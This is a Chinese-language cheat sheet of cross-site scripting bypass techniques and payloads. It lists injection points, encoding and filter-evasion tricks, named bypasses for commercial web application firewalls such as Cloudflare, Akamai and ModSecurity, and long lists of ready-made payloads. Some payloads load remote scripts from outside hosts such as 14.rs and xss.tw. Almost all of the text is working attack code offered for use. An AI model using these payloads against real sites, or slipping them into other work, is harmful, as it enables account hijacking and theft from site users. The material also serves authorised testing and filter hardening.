XSS bypass

XSS bypass方法

bypass利用点

1. GET/POST以及header可控参数
2. wifi热点/设备编号构造payload
3. 电话本/短信
4. 多平台验证构造的payload
5. 用户注册信息、用户名处
6. 直播评论位置
7. 在线客户交流
8. 分享到第三方平台
9. 富文本编辑器
10. 企业搭建的邮箱
11. 站内信息/私信
12. 各类搜索框
13. 浏览器插件
14. 发红包xss
15. 记事本、word、pdf在线预览功能
16. API接口
17. 上传功能点
18. 报销发票处
19. 移动app用户反馈
20. MhTML协议
21. 站点的手机web端
22. ATM机
23. 论坛等伪协议
24. 回复信息触发接受平台
25. 在线添加歌词、修改本地音乐
26. 图片上传、属性等可控参数
27. 截图上传
28. 页面读取系统时间
29. 微信公众号
30. 购物下单
31. 百度快照
32. 举报页面
33. 收藏夹

34. whois信息xss

    双Url编码

35. 把%url编码成%25，如果后台对参数有再次进行url decode 或者输出的时候url decode 就可以绕过WAF

    Base64编码

36. waf不拦截 < > ,但是会拦截script on xxxxx， 用Base64绕过

    1. <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

       HTML实体编码绕过

37. 实体编码一开始是为了避免 你的双引号中要i输入数据中包括双引号导致浏览把你的输入的引号当成上一个引号的姐妹标签而异常闭合提出的

38. payload：<a href='javascript:alert&#40;&#39;123&#39;&#41;'>hello</a> <a href="j&#97;vascript:alert&#0000040;'123'&#41;">hello</a>
39. tip：标签里的伪协议是不用双引号引起来的，加上eval函数后（eval认识 \x十六进制 八进制 \u unicode编码）
    1. <a href="j&#97;vascript:eval('&#;\u0091\x65\x72\x74\x28\x22\x31\x22\x29')">hello</a>
40. 页面直接显示输入内容，可以先html编码 在url编码
    1. <svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
41. 不带HTTP的payload
    1. <script/src=ttps://[14.rs](http://14.rs/) ></script>
    2. <script/src=ttp://[14.rs](http://14.rs/) ></script>
    3. <script/src=//[14.rs](http://14.rs/)></script>
42. 过滤/script
    1. <%2fscript>
    2. <%252fscript>
    3. <%252fScRipt>
    4. <%252fScrIPt%20>
    5. <%252fsCrIpt+ipT%20>
43. 利用javascript大小写绕过限制
44. 过滤括号
    1. 当括号被过滤的话，我们可以使用throw来绕过
    2. <a onmouseover="javascript:window.onerror=alert;throw 1>

    3. <img src="x onerror="javascript:window.onerror=alert;throw 1">

45. 利用0字节绕过
    1. <scri%00pt>alert(1);</scri%00pt>
    2. <scri\x00pt>alert(1);</scri%00pt>
    3. <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
46. 利用ascii编码绕过
    1. 利用其他ascii码绕过，正则表达式中的\w是无法匹配到的
    2. <img/ /\μ src=x onerror=alert(1)//>

    3. <img src=\x17\x17 onerror=alert(1)//>

    4. <img/%20src=%17y%17 onerror=%C2%A0alert(1)//>
47. 先拆分再组合
    1. <script>var a=’h';var b=’://’;document.write(‘<script src=”‘+a+’ttp’+b+’[xss.tw/xxx](http://xss.tw/xxx)”></script>’);</script>

48. 过滤括号和分号

    1. 我们可以使用花括号来进行语句隔离，将onerror整体放入花括号中，这样避免了使用分号：

       1. <script>{onerror=alert}throw 1337</script> <a name="mAghS"></a>

          常见的waf bypass

    2. WAF名称：CloudflarePayload：<a”/onclick=(confirm)()>click 绕过技术：非空格填充

    3. WAF名称：WordfencePayload：<a/href=javascript&colon;alert()>click 绕过技术：数字字符编码
    4. WAF名称：BarracudaPayload：<a/href=&#74;ava%0a%0d%09script&colon;alert()>click 绕过技术：数字字符编码
    5. WAF名称：AkamaiPayload：<d3v/onauxclick=[2].some(confirm)>click 绕过技术：黑名单中缺少事件处理器以及函数调用混淆
    6. WAF名称：ComodoPayload：<d3v/onauxclick=(((confirm)))“>click 绕过技术：黑名单中缺少事件处理器以及函数调用混淆
    7. WAF名称：F5Payload：<d3v/onmouseleave=[2].some(confirm)>click 绕过技术：黑名单中缺少事件处理器以及函数调用混淆
    8. WAF名称：ModSecurityPayload：<details/open/ontoggle=alert()> 绕过技术：黑名单中缺少标签或事件处理器
    9. WAF名称：dotdefenderPayload：<details/open/ontoggle=(confirm)()//

以上可能已经无法绕过waf，这里仅提供一个思路/笔记 <a name="SngZ2"></a>

XSS payload

a标签属性的 payload

<a href=javascript:eval(atob('YWxlcnQoMSk='))>click</a
<a href='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))'>click</a>
<a href="javascript:'\x3cimg src\x3dx onerror=alert(document.domain)>'">click me</a>
<a href="vbscript:alert(2)">click me</a> ------------只针对IE浏览器使用
13</script><script>alert("test")</script>

SRC属性的payload

<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);> 
<img/onerror=alert(1) src=a>
<audio src=x onerror=prompt(1);> 
<video src=x onerror=prompt(1);>
?img onerror=alert(1) src=a? -----------------------待实际测试
<img src=1 onMouseUp=(alert)(1)>

Iframe属性的payload

<iframe src="javascript:alert(2)">

action属性的payload

<form action="Javascript:alert(1)"><input type=submit>

formaction属性的payload

<form><button formaction=javascript&colon;alert(1)>CLICKME
<input type="text" onchange="javascript:alert('form_action4')"> 输入内容即可

事件触发的payload

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/ -----------待测试
<body onload=prompt(100);>
<select autofocus onfocus=alert(1)> -------------------恶性 弹窗去不掉
<textarea autofocus onfocus=alert(1)> --------------恶性 弹窗去不掉
<keygen autofocus onfocus=alert(1)> 
<video><source onerror="javascript:alert(1)"> -----------------恶性 弹窗去不掉
<marquee onstart="confirm()">hk</marquee>
<marquee behavior="alternate" onstart=prompt()>hk</marquee>
<marquee loop="1" onfinish=prompt()>hk</marquee>
<body onpageshow=prompt()>
<style onload=prompt()>
<!----><script>alert(0);</script>
<<script>alert(1);//<</script>
<+!-<script/src+=+\//\http://14.rs\//\+></script/src>-> ----------------待实际测试

HTML自解码机制

———这段代码在执行的过程中，会将html实体编码自解码为之前的符号，因此这段代码会执行alert(1)的弹窗。

常用的xss payload

<img src=1 onerror=alert(1)>
<script>alert(1)</script>
<audio src=1 onerror=alert(1)>
\%22oNmOuSeOvEr=prompt(1)//
<im\u0067 s\u0072c=1 one\u0072ror=a\u006cert(1)>
prompt(1)
<a%0aonpointerenter+=+a=prompt,a()%0dx>v3dm0s
xss" oninvalid=a=alert;a(1) pattern="a" type="submit" a=
＝号被过滤：<svg><script>alert&#40/1/&#41</script>   通杀所有浏览器
```html
top['ale'+'rt']() 
a\u006cert()  
alert`` 
top['a\u006ce'+'rt']``
%22%3E%3Cobject%20data=%22data%26colon;text/html;base64%26comma;PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%22%3E%3C/object%3E